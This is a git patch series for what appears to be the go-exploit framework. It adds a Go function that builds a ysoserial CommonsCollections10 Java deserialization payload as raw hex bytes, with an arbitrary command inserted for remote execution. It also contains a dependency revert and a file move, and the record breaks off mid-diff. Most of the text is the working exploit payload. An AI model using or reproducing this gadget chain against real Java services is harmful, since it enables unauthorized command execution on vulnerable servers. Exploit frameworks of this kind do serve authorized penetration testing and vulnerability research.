From 5dc15082cb79e61f0dd6e37c0f4cffe8ca278131 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem
Date: Tue, 18 Mar 2025 12:10:21 -0600
Subject: [PATCH 1/3] Added java deserialization exploit from CommonsCollections10

---
 go.mod | 2 +-
 go.sum | 4 +-
 java/javaclass.go | 290 ++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 293 insertions(+), 3 deletions(-)

diff --git a/go.mod b/go.mod
index b629ee6..7370dd0 100644
--- a/go.mod
+++ b/go.mod
@@ -8,7 +8,7 @@ require (
 	golang.org/x/crypto v0.36.0
 	golang.org/x/net v0.37.0
 	golang.org/x/text v0.23.0
-	modernc.org/sqlite v1.36.0
+	modernc.org/sqlite v1.36.1
 )
 
 require (
diff --git a/go.sum b/go.sum
index d72e8d1..38ca444 100644
--- a/go.sum
+++ b/go.sum
@@ -50,8 +50,8 @@ modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8=
 modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns=
 modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w=
 modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE=
-modernc.org/sqlite v1.36.0 h1:EQXNRn4nIS+gfsKeUTymHIz1waxuv5BzU7558dHSfH8=
-modernc.org/sqlite v1.36.0/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
+modernc.org/sqlite v1.36.1 h1:bDa8BJUH4lg6EGkLbahKe/8QqoF8p9gArSc6fTqYhyQ=
+modernc.org/sqlite v1.36.1/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
 modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0=
 modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A=
 modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=
diff --git a/java/javaclass.go b/java/javaclass.go
index e40690c..0a404b5 100644
--- a/java/javaclass.go
+++ b/java/javaclass.go
@@ -1,15 +1,305 @@
 package java
 
 import (
+	"fmt"
 	"encoding/binary"
 	"strconv"
 	"strings"
+	"errors"
 
 	"github.com/vulncheck-oss/go-exploit/config"
 	"github.com/vulncheck-oss/go-exploit/random"
 	"github.com/vulncheck-oss/go-exploit/transform"
 )
 
+var (
+	errInvalidCommandLength = errors.New("invalid command length")
+)
+
+func ErrorInvalidCommandLength(msg string) error {
+	return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
+}
+
+// Created using ysoserial with CommonsCollections10
+// It was created by allocating 255 space characters for the command
+// We just use what amount of that space we need for the command and put
+// the remaining spaces back after we're finished.
+// This does however mean that the commandStr has a length limitation of
+// the allocated space (255)
+func Commons11CommandBytecode(commandStr string) ([]byte, error) {
+	if len(commandStr) > 255 {
+		return []byte{}, ErrorInvalidCommandLength("command cannot be longer than 255 characters")
+	}
+
+	if len(commandStr) <= 0 {
+		return []byte{}, ErrorInvalidCommandLength("command must be greater than 0 characters")
+	}
+
+	payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61"+
+		"\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65"+
+		"\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00"+
+		"\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00"+
+		"\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e"+
+		"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+
+		"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+
+		"\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e"+
+		"\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79"+
+		"\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c"+
+		"\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76"+
+		"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+
+		"\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c"+
+		"\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61"+
+		"\x70\x3b\x78\x70\x73\x72\x00\x3a\x63\x6f\x6d\x2e"+
+		"\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63"+ +
"\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74"+ + "\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e"+ + "\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74"+ + "\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac"+ + "\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64"+ + "\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e"+ + "\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64"+ + "\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f"+ + "\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06"+ + "\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a"+ + "\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61"+ + "\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x74"+ + "\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"+ + "\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x11\x5f"+ + "\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72"+ + "\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61"+ + "\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72"+ + "\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff"+ + "\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd"+ + "\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00"+ + "\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17"+ + "\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00"+ + "\x07\x93\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x39"+ + "\x0a\x00\x03\x00\x22\x07\x00\x37\x07\x00\x25\x07"+ + "\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56"+ + "\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01"+ + "\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74"+ + "\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd"+ + "\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01"+ + "\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65"+ + "\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65"+ + "\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63"+ + "\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61"+ + "\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00"+ + "\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65"+ + "\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49"+ + "\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01"+ + 
"\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+ + "\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+ + "\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53"+ + "\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50"+ + "\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72"+ + "\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c"+ + "\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f"+ + "\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e"+ + "\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73"+ + "\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f"+ + "\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+ + "\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+ + "\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+ + "\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+ + "\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+ + "\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d"+ + "\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73"+ + "\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+ + "\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65"+ + "\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44"+ + "\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65"+ + "\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73"+ + "\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+ + "\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+ + "\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65"+ + "\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74"+ + "\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01"+ + "\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73"+ + "\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f"+ + "\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+ + "\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+ + "\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+ + "\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e"+ + "\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f"+ + "\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c"+ + "\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73"+ + "\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f"+ + 
"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+ + "\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+ + "\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+ + "\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+ + "\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+ + "\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61"+ + "\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73"+ + "\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+ + "\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+ + "\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78"+ + "\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01"+ + "\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41"+ + "\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67"+ + "\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f"+ + "\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72"+ + "\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69"+ + "\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e"+ + "\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72"+ + "\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64"+ + "\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a"+ + "\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73"+ + "\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+ + "\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+ + "\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e"+ + "\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01"+ + "\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72"+ + "\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c"+ + "\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f"+ + "\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d"+ + "\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72"+ + "\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76"+ + "\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69"+ + "\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f"+ + "\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+ + "\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+ + "\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+ + "\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65"+ + 
"\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73"+ + "\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+ + "\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+ + "\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69"+ + "\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61"+ + "\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00"+ + "\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69"+ + "\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61"+ + "\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d"+ + "\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e"+ + + // 255 characters were allocated, we just put back the unused + // length as spaces + "\x01\x00\xff" + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) + + + "\x08\x00\x30\x01\x00\x04"+ + "\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76"+ + "\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e"+ + "\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e"+ + "\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00"+ + "\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x0d\x53"+ + "\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65"+ + "\x01\x00\x1d\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+ + "\x2f\x50\x77\x6e\x65\x72\x37\x34\x30\x30\x32\x30"+ + "\x33\x39\x32\x34\x35\x37\x39\x31\x01\x00\x1f\x4c"+ + "\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77"+ + "\x6e\x65\x72\x37\x34\x30\x30\x32\x30\x33\x39\x32"+ + "\x34\x35\x37\x39\x31\x3b\x00\x21\x00\x02\x00\x03"+ + "\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06"+ + "\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04"+ + "\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00"+ + "\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7"+ + "\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+ + "\x06\x00\x01\x00\x00\x00\x2f\x00\x0e\x00\x00\x00"+ + "\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x38\x00"+ + "\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00"+ + "\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1"+ + "\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01"+ + "\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03"+ + 
"\x00\x00\x00\x01\x00\x0f\x00\x38\x00\x00\x00\x00"+ + "\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01"+ + "\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04"+ + "\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02"+ + "\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00"+ + "\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+ + "\x06\x00\x01\x00\x00\x00\x36\x00\x0e\x00\x00\x00"+ + "\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x38\x00"+ + "\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00"+ + "\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00"+ + "\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00"+ + "\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00"+ + "\x01\x00\x0c\x00\x00\x00\x24\x00\x03\x00\x02\x00"+ + "\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12"+ + "\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x01\x00\x36"+ + "\x00\x00\x00\x03\x00\x01\x03\x00\x02\x00\x20\x00"+ + "\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00"+ + "\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00"+ + "\x7e\x00\x0e\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00"+ + "\x00\x00\x32\x00\x1b\x0a\x00\x03\x00\x15\x07\x00"+ + "\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65"+ + "\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55"+ + "\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e"+ + "\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71"+ + "\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69"+ + "\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00"+ + "\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65"+ + "\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01"+ + "\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61"+ + "\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74"+ + "\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c"+ + "\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73"+ + "\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61"+ + "\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75"+ + "\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24"+ + "\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63"+ + "\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67"+ + 
"\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00"+ + "\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65"+ + "\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64"+ + "\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65"+ + "\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76"+ + "\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+ + "\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f"+ + "\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65"+ + "\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+ + "\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+ + "\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21"+ + "\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a"+ + "\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02"+ + "\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01"+ + "\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00"+ + "\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00"+ + "\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3a\x00"+ + "\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00"+ + "\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00"+ + "\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00"+ + "\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50"+ + "\x77\x6e\x72\x70\x77\x01\x00\x78\x73\x72\x00\x2a"+ + "\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63"+ + "\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65"+ + "\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c"+ + "\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79"+ + "\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74"+ + "\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61"+ + "\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e"+ + "\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e"+ + "\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65"+ + "\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e"+ + "\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+ + "\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+ + "\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e"+ + "\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73"+ + "\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c"+ + 
"\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67"+ + "\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c"+ + "\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c"+ + "\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d"+ + "\x65\x71\x00\x7e\x00\x09\x5b\x00\x0b\x69\x50\x61"+ + "\x72\x61\x6d\x54\x79\x70\x65\x73\x71\x00\x7e\x00"+ + "\x08\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76"+ + "\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63"+ + "\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00"+ + "\x00\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65"+ + "\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72"+ + "\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"+ + "\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16"+ + "\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00"+ + "\x00\x00\x00\x73\x72\x00\x11\x6a\x61\x76\x61\x2e"+ + "\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70"+ + "\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46"+ + "\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72"+ + "\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64"+ + "\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08"+ + "\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78" + + return []byte(payloadBytes), nil +} + // This is the Java bytecode for a reverse shell. You can find the source code here: // // https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508 From 7de4b5db70ff89667a5169a790b9a3554026a688 Mon Sep 17 00:00:00 2001 From: lobsterjerusalem Date: Tue, 18 Mar 2025 12:14:56 -0600 Subject: [PATCH 2/3] Added back old go.mod and go.sum --- go.mod | 2 +- go.sum | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/go.mod b/go.mod index 7370dd0..b629ee6 100644 --- a/go.mod +++ b/go.mod @@ -8,7 +8,7 @@ require ( golang.org/x/crypto v0.36.0 golang.org/x/net v0.37.0 golang.org/x/text v0.23.0 - modernc.org/sqlite v1.36.1 + modernc.org/sqlite v1.36.0 ) require ( diff --git a/go.sum b/go.sum index 38ca444..d72e8d1 100644 --- a/go.sum +++ b/go.sum 
@@ -50,8 +50,8 @@ modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8=
 modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns=
 modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w=
 modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE=
-modernc.org/sqlite v1.36.1 h1:bDa8BJUH4lg6EGkLbahKe/8QqoF8p9gArSc6fTqYhyQ=
-modernc.org/sqlite v1.36.1/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
+modernc.org/sqlite v1.36.0 h1:EQXNRn4nIS+gfsKeUTymHIz1waxuv5BzU7558dHSfH8=
+modernc.org/sqlite v1.36.0/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
 modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0=
 modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A=
 modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=

From 5dd50742f0a7e8e13fb1d52fa3d3df53cdfa6df0 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem
Date: Tue, 18 Mar 2025 15:29:01 -0600
Subject: [PATCH 3/3] Realized it made more sense to put it in the right file. Also simplified error check.

---
 java/javaclass.go | 290 --------------------------------------------
 java/javagadget.go | 279 +++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 279 insertions(+), 290 deletions(-)

diff --git a/java/javaclass.go b/java/javaclass.go
index 0a404b5..e40690c 100644
--- a/java/javaclass.go
+++ b/java/javaclass.go
@@ -1,305 +1,15 @@ package java import ( - "fmt" "encoding/binary" "strconv" "strings" - "errors" "github.com/vulncheck-oss/go-exploit/config" "github.com/vulncheck-oss/go-exploit/random" "github.com/vulncheck-oss/go-exploit/transform" ) -var ( - errInvalidCommandLength = errors.New("invalid command length") -) - -func ErrorInvalidCommandLength(msg string) error { - return fmt.Errorf("%w: %s", errInvalidCommandLength, msg) -} - -// Created using ysoserial with CommonsCollections10 -// It was created by allocating 255 space characters for the command -// We just use what amount of that space we need for the command and put -// the remaining spaces back after we're finished. -// This does however mean that the commandStr has a length limitation of -// the allocated space (255) -func Commons11CommandBytecode(commandStr string) ([]byte, error) { - if len(commandStr) > 255 { - return []byte{}, 